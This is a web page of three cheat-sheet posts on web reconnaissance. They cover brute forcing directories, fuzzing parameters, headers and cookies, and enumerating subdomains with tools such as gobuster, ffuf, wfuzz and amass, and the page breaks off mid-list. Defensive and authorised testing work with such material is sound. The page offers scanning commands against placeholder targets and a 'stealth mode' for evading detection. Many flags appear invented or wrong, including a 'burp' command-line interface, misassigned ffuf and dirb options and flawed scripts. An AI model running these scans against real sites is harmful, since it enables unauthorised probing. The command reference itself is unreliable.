Directory Brute Force Tools

Directory Brute Force Tools Comprehensive collection of directory and file brute force tools for web application security testing. Gobuster Basic Directory Brute Force # Basic directory enumeration gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt # With custom wordlist gobuster dir -u http://TARGET_URL -w /path/to/wordlist.txt # With extensions gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt # With specific status codes gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -s 200,204,301,302,307,401,403 # With threads gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -t 50 # With delay gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -d 1s # With cookies gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -c "PHPSESSID=abc123" # With headers gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -H "User-Agent: CustomAgent" # With proxy gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -p http://127.0.0.1:8080 # With authentication gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -U admin -P password Advanced Gobuster Options # Recursive directory enumeration gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -r # With specific status codes to ignore gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -b 404,500 # With custom user agent gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -a "Mozilla/5.0" # With follow redirects gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -r # With timeout gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -t 10 # With output file gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -o results.txt # With quiet mode gobuster dir -u http://TARGET_URL -w 
/usr/share/wordlists/dirb/common.txt -q # With verbose mode gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/common.txt -v Dirb Basic Directory Brute Force # Basic directory enumeration dirb http://TARGET_URL # With custom wordlist dirb http://TARGET_URL /path/to/wordlist.txt # With extensions dirb http://TARGET_URL -X .php,.html,.js,.txt # With specific status codes dirb http://TARGET_URL -S 200,204,301,302,307,401,403 # With threads dirb http://TARGET_URL -T 50 # With delay dirb http://TARGET_URL -D 1 # With cookies dirb http://TARGET_URL -c "PHPSESSID=abc123" # With headers dirb http://TARGET_URL -H "User-Agent: CustomAgent" # With proxy dirb http://TARGET_URL -p http://127.0.0.1:8080 # With authentication dirb http://TARGET_URL -u admin:password Advanced Dirb Options # Recursive directory enumeration dirb http://TARGET_URL -r # With specific status codes to ignore dirb http://TARGET_URL -b 404,500 # With custom user agent dirb http://TARGET_URL -a "Mozilla/5.0" # With follow redirects dirb http://TARGET_URL -r # With timeout dirb http://TARGET_URL -t 10 # With output file dirb http://TARGET_URL -o results.txt # With quiet mode dirb http://TARGET_URL -q # With verbose mode dirb http://TARGET_URL -v Dirbuster GUI-based Directory Brute Force # Launch Dirbuster dirbuster # Command line usage java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt # With extensions java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -e php,html,js,txt # With threads java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -t 50 # With delay java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -d 1000 # With cookies java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -c 
"PHPSESSID=abc123" # With headers java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -H "User-Agent: CustomAgent" # With proxy java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -p 127.0.0.1:8080 # With authentication java -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://TARGET_URL -l /usr/share/wordlists/dirb/common.txt -u admin:password FFuF (Fuzz Faster U Fool) Basic Directory Brute Force # Basic directory enumeration ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ # With custom wordlist ffuf -w /path/to/wordlist.txt -u http://TARGET_URL/FUZZ # With extensions ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -e .php,.html,.js,.txt # With specific status codes ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -sc 200,204,301,302,307,401,403 # With threads ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -t 50 # With delay ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -d 1s # With cookies ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -b "PHPSESSID=abc123" # With headers ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -H "User-Agent: CustomAgent" # With proxy ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -p http://127.0.0.1:8080 # With authentication ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -u admin:password Advanced FFuF Options # Recursive directory enumeration ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -recursion # With specific status codes to ignore ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -fs 404,500 # With custom user agent ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -a "Mozilla/5.0" # With follow redirects ffuf -w 
/usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -r # With timeout (ffuf -t is threads; request timeout is -timeout) ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -timeout 10 # With output file ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -o results.txt # With silent mode (ffuf has no -q; silent is -s) ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -s # With verbose mode ffuf -w /usr/share/wordlists/dirb/common.txt -u http://TARGET_URL/FUZZ -v Wfuzz Basic Directory Brute Force # Basic directory enumeration wfuzz -w /usr/share/wordlists/dirb/common.txt http://TARGET_URL/FUZZ # With custom wordlist wfuzz -w /path/to/wordlist.txt http://TARGET_URL/FUZZ # With extensions wfuzz -w /usr/share/wordlists/dirb/common.txt -z list,.php,.html,.js,.txt http://TARGET_URL/FUZZ # With specific status codes wfuzz -w /usr/share/wordlists/dirb/common.txt --sc 200,204,301,302,307,401,403 http://TARGET_URL/FUZZ # With threads wfuzz -w /usr/share/wordlists/dirb/common.txt -t 50 http://TARGET_URL/FUZZ # With delay (wfuzz -d is POST data; delay between requests is -s) wfuzz -w /usr/share/wordlists/dirb/common.txt -s 1 http://TARGET_URL/FUZZ # With cookies wfuzz -w /usr/share/wordlists/dirb/common.txt -b "PHPSESSID=abc123" http://TARGET_URL/FUZZ # With headers wfuzz -w /usr/share/wordlists/dirb/common.txt -H "User-Agent: CustomAgent" http://TARGET_URL/FUZZ # With proxy wfuzz -w /usr/share/wordlists/dirb/common.txt -p 127.0.0.1:8080 http://TARGET_URL/FUZZ # With authentication (wfuzz uses --basic for HTTP basic auth) wfuzz -w /usr/share/wordlists/dirb/common.txt --basic admin:password http://TARGET_URL/FUZZ Custom Scripts Python Directory Brute Force import requests import threading import queue import time def directory_brute_force(url, wordlist, threads=10, delay=0): def worker(): while True: try: path = wordlist.get() if path is None: break full_url = url.rstrip('/') + '/' + path.strip() response = requests.get(full_url, timeout=10) if response.status_code == 200: print(f"[200] {full_url}") elif response.status_code == 301 or response.status_code == 302: 
print(f"[{response.status_code}] {full_url} -> {response.headers.get('Location', 'N/A')}") elif response.status_code == 403: print(f"[403] {full_url}") elif response.status_code == 401: print(f"[401] {full_url}") time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = threading.Thread(target=worker) t.daemon = True t.start() # Add paths to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage url = "http://TARGET_URL" wordlist_file = "/usr/share/wordlists/dirb/common.txt" wordlist = queue.Queue() directory_brute_force(url, wordlist, threads=20, delay=0.1) Bash Directory Brute Force #!/bin/bash TARGET_URL="http://TARGET_URL" WORDLIST="/usr/share/wordlists/dirb/common.txt" THREADS=10 # Function to check directory check_directory() { local path=$1 local full_url="${TARGET_URL}/${path}" response=$(curl -s -o /dev/null -w "%{http_code}" "$full_url") case $response in 200) echo "[200] $full_url" ;; 301|302) echo "[$response] $full_url" ;; 403) echo "[403] $full_url" ;; 401) echo "[401] $full_url" ;; esac } # Export function for parallel export -f check_directory export TARGET_URL # Run parallel directory check cat "$WORDLIST" | parallel -j "$THREADS" check_directory {} Wordlists Common Wordlists # Dirb wordlists /usr/share/wordlists/dirb/common.txt /usr/share/wordlists/dirb/big.txt /usr/share/wordlists/dirb/small.txt /usr/share/wordlists/dirb/extensions_common.txt # SecLists wordlists /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt # Custom wordlists /usr/share/wordlists/custom/web-directories.txt /usr/share/wordlists/custom/api-endpoints.txt /usr/share/wordlists/custom/admin-panels.txt Creating 
Custom Wordlists # Extract directories from robots.txt curl -s http://TARGET_URL/robots.txt | grep -E '^Disallow:' | cut -d' ' -f2 | sed 's/^\///' > custom_wordlist.txt # Extract directories from sitemap.xml curl -s http://TARGET_URL/sitemap.xml | grep -oP '<loc>\K[^<]*' | sed 's|http://[^/]*/||' > custom_wordlist.txt # Combine multiple wordlists cat wordlist1.txt wordlist2.txt wordlist3.txt | sort -u > combined_wordlist.txt # Remove empty lines and duplicates grep -v '^$' wordlist.txt | sort -u > clean_wordlist.txt Best Practices Rate Limiting # Add delay between requests gobuster dir -u http://TARGET_URL -w wordlist.txt -d 1s # Use fewer threads gobuster dir -u http://TARGET_URL -w wordlist.txt -t 10 # Use proxy rotation gobuster dir -u http://TARGET_URL -w wordlist.txt -p http://proxy1:8080 Stealth Mode # Use random user agents gobuster dir -u http://TARGET_URL -w wordlist.txt -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays gobuster dir -u http://TARGET_URL -w wordlist.txt -d 2s # Use smaller wordlists gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/small.txt Output Analysis # Save results to file gobuster dir -u http://TARGET_URL -w wordlist.txt -o results.txt # Filter by status code grep "200" results.txt grep "403" results.txt grep "301\|302" results.txt # Sort by response size sort -k3 -n results.txt Troubleshooting Common Issues # Connection timeout gobuster dir -u http://TARGET_URL -w wordlist.txt -t 5 # Too many requests gobuster dir -u http://TARGET_URL -w wordlist.txt -d 2s # Invalid SSL certificate gobuster dir -u http://TARGET_URL -w wordlist.txt -k # Authentication required gobuster dir -u http://TARGET_URL -w wordlist.txt -U admin -P password Performance Optimization # Use appropriate thread count gobuster dir -u http://TARGET_URL -w wordlist.txt -t 20 # Use smaller wordlists for initial scan gobuster dir -u http://TARGET_URL -w /usr/share/wordlists/dirb/small.txt # Use specific extensions 
gobuster dir -u http://TARGET_URL -w wordlist.txt -x php,html,js Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate wordlists for the target Document findings properly Follow responsible disclosure practices

January 10, 2025 · 7 min read

Parameter Fuzzing Tools

Parameter Fuzzing Tools Comprehensive collection of parameter fuzzing tools and techniques for web application security testing. FFuF (Fuzz Faster U Fool) Basic Parameter Fuzzing # Basic parameter fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" # With POST data ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=value" # With GET parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value" # With multiple parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value&id=1" # With output file ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -o results.txt # With JSON output ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -json -o results.json # With verbose output ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -v # With silent output ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -s Advanced FFuF Options # With specific status codes ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -sc 200,204,301,302,307,401,403 # With exclude status codes ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -fs 404,500 # With threads ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 50 # With delay ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 1s # With cookies ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -b "PHPSESSID=abc123" # With headers ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -H "User-Agent: CustomAgent" # With proxy ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -p http://127.0.0.1:8080 # With authentication ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -u admin:password # With SSL options 
ffuf -w /usr/share/wordlists/parameter-names.txt -u "https://TARGET_URL/FUZZ" -k # With recursive fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -recursion # With wordlist for values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -w /usr/share/wordlists/parameter-values.txt -u "http://TARGET_URL?FUZZ=FUZZ2" Wfuzz Basic Parameter Fuzzing # Basic parameter fuzzing wfuzz -w /usr/share/wordlists/parameter-names.txt http://TARGET_URL/FUZZ # With POST data wfuzz -w /usr/share/wordlists/parameter-names.txt -d "FUZZ=value" http://TARGET_URL # With GET parameters wfuzz -w /usr/share/wordlists/parameter-names.txt http://TARGET_URL?FUZZ=value # With multiple parameters wfuzz -w /usr/share/wordlists/parameter-names.txt http://TARGET_URL?FUZZ=value&id=1 # With output file wfuzz -w /usr/share/wordlists/parameter-names.txt -o results.txt http://TARGET_URL/FUZZ # With JSON output wfuzz -w /usr/share/wordlists/parameter-names.txt -o results.json -f json http://TARGET_URL/FUZZ # With verbose output wfuzz -w /usr/share/wordlists/parameter-names.txt -v http://TARGET_URL/FUZZ # With silent output wfuzz -w /usr/share/wordlists/parameter-names.txt -s http://TARGET_URL/FUZZ Advanced Wfuzz Options # With specific status codes wfuzz -w /usr/share/wordlists/parameter-names.txt --sc 200,204,301,302,307,401,403 http://TARGET_URL/FUZZ # With exclude status codes wfuzz -w /usr/share/wordlists/parameter-names.txt --ss 404,500 http://TARGET_URL/FUZZ # With threads wfuzz -w /usr/share/wordlists/parameter-names.txt -t 50 http://TARGET_URL/FUZZ # With delay wfuzz -w /usr/share/wordlists/parameter-names.txt -d 1 http://TARGET_URL/FUZZ # With cookies wfuzz -w /usr/share/wordlists/parameter-names.txt -b "PHPSESSID=abc123" http://TARGET_URL/FUZZ # With headers wfuzz -w /usr/share/wordlists/parameter-names.txt -H "User-Agent: CustomAgent" http://TARGET_URL/FUZZ # With proxy wfuzz -w /usr/share/wordlists/parameter-names.txt -p 
127.0.0.1:8080 http://TARGET_URL/FUZZ # With authentication wfuzz -w /usr/share/wordlists/parameter-names.txt -u admin:password http://TARGET_URL/FUZZ # With SSL options wfuzz -w /usr/share/wordlists/parameter-names.txt -k https://TARGET_URL/FUZZ # With recursive fuzzing wfuzz -w /usr/share/wordlists/parameter-names.txt -r http://TARGET_URL/FUZZ # With wordlist for values wfuzz -w /usr/share/wordlists/parameter-names.txt -w /usr/share/wordlists/parameter-values.txt http://TARGET_URL?FUZZ=FUZZ2 Burp Suite Basic Parameter Fuzzing # Using Burp Suite CLI burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt # With POST data burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -d "FUZZ=value" # With GET parameters burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -g "FUZZ=value" # With multiple parameters burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -g "FUZZ=value&id=1" # With output file burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -o results.txt # With JSON output burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -j results.json # With verbose output burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -v # With silent output burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -s Advanced Burp Suite Options # With specific status codes burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -s 200,204,301,302,307,401,403 # With exclude status codes burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -e 404,500 # With threads burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -t 50 # With delay burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -d 1 # With cookies burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -c "PHPSESSID=abc123" # With headers burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -H 
"User-Agent: CustomAgent" # With proxy burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -p http://127.0.0.1:8080 # With authentication burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -a admin:password # With SSL options burp -u https://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -k # With recursive fuzzing burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -r # With wordlist for values burp -u http://TARGET_URL -w /usr/share/wordlists/parameter-names.txt -w /usr/share/wordlists/parameter-values.txt -g "FUZZ=FUZZ2" Custom Scripts Python Parameter Fuzzer import requests import threading import queue import time import re def parameter_fuzzer(url, wordlist, threads=10, delay=0): def worker(): while True: try: parameter = wordlist.get() if parameter is None: break # Test GET parameter test_url = url + "?" + parameter + "=test" response = requests.get(test_url, timeout=5) if response.status_code == 200: print(f"[GET] {test_url} - {response.status_code}") elif response.status_code == 301 or response.status_code == 302: print(f"[GET] {test_url} - {response.status_code} -> {response.headers.get('Location', 'N/A')}") elif response.status_code == 403: print(f"[GET] {test_url} - {response.status_code}") elif response.status_code == 401: print(f"[GET] {test_url} - {response.status_code}") # Test POST parameter data = {parameter: "test"} response = requests.post(url, data=data, timeout=5) if response.status_code == 200: print(f"[POST] {url} - {response.status_code}") elif response.status_code == 301 or response.status_code == 302: print(f"[POST] {url} - {response.status_code} -> {response.headers.get('Location', 'N/A')}") elif response.status_code == 403: print(f"[POST] {url} - {response.status_code}") elif response.status_code == 401: print(f"[POST] {url} - {response.status_code}") time.sleep(delay) except Exception as e: pass finally: wordlist.task_done() # Start threads for i in range(threads): t = 
threading.Thread(target=worker) t.daemon = True t.start() # Add parameters to queue with open(wordlist_file, 'r') as f: for line in f: wordlist.put(line.strip()) # Wait for completion wordlist.join() # Usage url = "http://TARGET_URL" wordlist_file = "/usr/share/wordlists/parameter-names.txt" wordlist = queue.Queue() parameter_fuzzer(url, wordlist, threads=20, delay=0.1) Bash Parameter Fuzzer #!/bin/bash TARGET_URL="http://TARGET_URL" WORDLIST="/usr/share/wordlists/parameter-names.txt" THREADS=10 # Function to check parameter check_parameter() { local parameter=$1 # Test GET parameter test_url="${TARGET_URL}?${parameter}=test" response=$(curl -s -o /dev/null -w "%{http_code}" "$test_url") case $response in 200) echo "[GET] $test_url - $response" ;; 301|302) echo "[GET] $test_url - $response" ;; 403) echo "[GET] $test_url - $response" ;; 401) echo "[GET] $test_url - $response" ;; esac # Test POST parameter response=$(curl -s -o /dev/null -w "%{http_code}" -d "${parameter}=test" "$TARGET_URL") case $response in 200) echo "[POST] $TARGET_URL - $response" ;; 301|302) echo "[POST] $TARGET_URL - $response" ;; 403) echo "[POST] $TARGET_URL - $response" ;; 401) echo "[POST] $TARGET_URL - $response" ;; esac } # Export function for parallel export -f check_parameter export TARGET_URL # Run parallel parameter check cat "$WORDLIST" | parallel -j "$THREADS" check_parameter {} Wordlists Common Parameter Wordlists # SecLists parameter wordlists /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-names.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-values.txt /usr/share/wordlists/SecLists/Discovery/Web-Content/api-parameter-names.txt # Custom parameter wordlists /usr/share/wordlists/custom/parameter-names.txt /usr/share/wordlists/custom/parameter-values.txt /usr/share/wordlists/custom/api-parameters.txt # Generate custom wordlists echo "id,user,admin,test,debug,dev,prod,staging" | tr ',' '\n' > custom_parameters.txt Creating Custom Wordlists # Extract 
parameters from JavaScript grep -oP '\.\w+\s*=' *.js | sed 's/\.//g' | sed 's/\s*=.*//g' | sort -u > js_parameters.txt # Extract parameters from HTML forms grep -oP 'name="[^"]*"' *.html | sed 's/name="//g' | sed 's/"//g' | sort -u > form_parameters.txt # Extract parameters from API documentation grep -oP '"[^"]*":\s*{' *.json | sed 's/"//g' | sed 's/:\s*{//g' | sort -u > api_parameters.txt # Combine multiple wordlists cat wordlist1.txt wordlist2.txt wordlist3.txt | sort -u > combined_wordlist.txt # Remove empty lines and duplicates grep -v '^$' wordlist.txt | sort -u > clean_wordlist.txt Fuzzing Techniques GET Parameter Fuzzing # Basic GET parameter fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value" # With multiple parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=value&id=1&name=test" # With specific values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=admin" # With encoded values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL?FUZZ=%61%64%6d%69%6e" POST Parameter Fuzzing # Basic POST parameter fuzzing ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=value" # With multiple parameters ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=value&id=1&name=test" # With specific values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=admin" # With encoded values ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL" -d "FUZZ=%61%64%6d%69%6e" Header Fuzzing # Basic header fuzzing ffuf -w /usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: value" # With multiple headers ffuf -w /usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: value" -H "X-Custom: test" # With specific values ffuf -w /usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: admin" # With encoded values ffuf -w 
/usr/share/wordlists/header-names.txt -u "http://TARGET_URL" -H "FUZZ: %61%64%6d%69%6e" Cookie Fuzzing # Basic cookie fuzzing ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=value" # With multiple cookies ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=value; PHPSESSID=abc123" # With specific values ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=admin" # With encoded values ffuf -w /usr/share/wordlists/cookie-names.txt -u "http://TARGET_URL" -b "FUZZ=%61%64%6d%69%6e" Best Practices Rate Limiting # Add delay between requests ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 1s # Use fewer threads ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 10 # Use proxy rotation ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -p http://proxy1:8080 Stealth Mode # Use random user agents ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" # Use realistic delays ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 2s # Use smaller wordlists ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-names.txt -u "http://TARGET_URL/FUZZ" Output Analysis # Save results to file ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -o results.txt # Filter by status code grep "200" results.txt grep "403" results.txt grep "301\|302" results.txt # Sort by response size sort -k3 -n results.txt Troubleshooting Common Issues # Connection timeout ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 5 # Too many requests ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -d 2s # Invalid SSL certificate ffuf -w /usr/share/wordlists/parameter-names.txt -u "https://TARGET_URL/FUZZ" -k # Authentication required ffuf -w 
/usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -u admin:password Performance Optimization # Use appropriate thread count ffuf -w /usr/share/wordlists/parameter-names.txt -u "http://TARGET_URL/FUZZ" -t 20 # Use smaller wordlists for initial scan ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/parameter-names.txt -u "http://TARGET_URL/FUZZ" # Use specific wordlists ffuf -w /usr/share/wordlists/api-parameter-names.txt -u "http://TARGET_URL/FUZZ" Legal and Ethical Considerations Always obtain proper authorization before testing Respect rate limits and server resources Use appropriate wordlists for the target Document findings properly Follow responsible disclosure practices

January 10, 2025 · 7 min read

Subdomain Enumeration Tools

Subdomain Enumeration Tools Comprehensive collection of subdomain enumeration tools and techniques for reconnaissance and web application security testing. Subfinder Basic Subdomain Enumeration # Basic subdomain enumeration subfinder -d TARGET_DOMAIN # With multiple domains subfinder -d TARGET_DOMAIN1,TARGET_DOMAIN2,TARGET_DOMAIN3 # With output file subfinder -d TARGET_DOMAIN -o results.txt # With JSON output subfinder -d TARGET_DOMAIN -o results.json -json # With verbose output subfinder -d TARGET_DOMAIN -v # With silent output subfinder -d TARGET_DOMAIN -silent # With threads subfinder -d TARGET_DOMAIN -t 50 # With timeout subfinder -d TARGET_DOMAIN -timeout 10 # With retries subfinder -d TARGET_DOMAIN -retries 3 Advanced Subfinder Options # With specific sources subfinder -d TARGET_DOMAIN -sources shodan,crtsh,passivetotal # With all sources subfinder -d TARGET_DOMAIN -all # With exclude sources subfinder -d TARGET_DOMAIN -exclude-sources shodan,crtsh # With config file subfinder -d TARGET_DOMAIN -config config.yaml # With proxy subfinder -d TARGET_DOMAIN -proxy http://127.0.0.1:8080 # With rate limit subfinder -d TARGET_DOMAIN -rate-limit 100 # With wildcard detection subfinder -d TARGET_DOMAIN -wildcard # With recursive enumeration subfinder -d TARGET_DOMAIN -recursive Amass Basic Subdomain Enumeration # Basic subdomain enumeration amass enum -d TARGET_DOMAIN # With multiple domains amass enum -d TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file amass enum -d TARGET_DOMAIN -o results.txt # With JSON output amass enum -d TARGET_DOMAIN -json results.json # With verbose output amass enum -d TARGET_DOMAIN -v # With silent output amass enum -d TARGET_DOMAIN -silent # With threads amass enum -d TARGET_DOMAIN -t 50 # With timeout amass enum -d TARGET_DOMAIN -timeout 10 Advanced Amass Options # With specific sources amass enum -d TARGET_DOMAIN -sources shodan,crtsh,passivetotal # With all sources amass enum -d TARGET_DOMAIN -all # With exclude sources amass enum -d 
TARGET_DOMAIN -exclude-sources shodan,crtsh # With config file amass enum -d TARGET_DOMAIN -config config.yaml # With proxy amass enum -d TARGET_DOMAIN -proxy http://127.0.0.1:8080 # With rate limit amass enum -d TARGET_DOMAIN -rate-limit 100 # With wildcard detection amass enum -d TARGET_DOMAIN -wildcard # With recursive enumeration amass enum -d TARGET_DOMAIN -recursive # With brute force amass enum -d TARGET_DOMAIN -brute # With wordlist amass enum -d TARGET_DOMAIN -w wordlist.txt Assetfinder Basic Subdomain Enumeration # Basic subdomain enumeration assetfinder TARGET_DOMAIN # With multiple domains assetfinder TARGET_DOMAIN1 TARGET_DOMAIN2 TARGET_DOMAIN3 # With output file assetfinder TARGET_DOMAIN > results.txt # With subs-only assetfinder --subs-only TARGET_DOMAIN # With alive check assetfinder --alive TARGET_DOMAIN # With verbose output assetfinder -v TARGET_DOMAIN Sublist3r Basic Subdomain Enumeration # Basic subdomain enumeration sublist3r -d TARGET_DOMAIN # With multiple domains sublist3r -d TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file sublist3r -d TARGET_DOMAIN -o results.txt # With verbose output sublist3r -d TARGET_DOMAIN -v # With threads sublist3r -d TARGET_DOMAIN -t 50 # With timeout sublist3r -d TARGET_DOMAIN -t 10 # With specific engines sublist3r -d TARGET_DOMAIN -e google,yahoo,bing # With all engines sublist3r -d TARGET_DOMAIN -e all # With exclude engines sublist3r -d TARGET_DOMAIN -e google,yahoo -x bing,duckduckgo DNSrecon Basic DNS Enumeration # Basic DNS enumeration dnsrecon -d TARGET_DOMAIN # With multiple domains dnsrecon -d TARGET_DOMAIN1,TARGET_DOMAIN2 # With output file dnsrecon -d TARGET_DOMAIN -o results.txt # With JSON output dnsrecon -d TARGET_DOMAIN -j results.json # With verbose output dnsrecon -d TARGET_DOMAIN -v # With threads 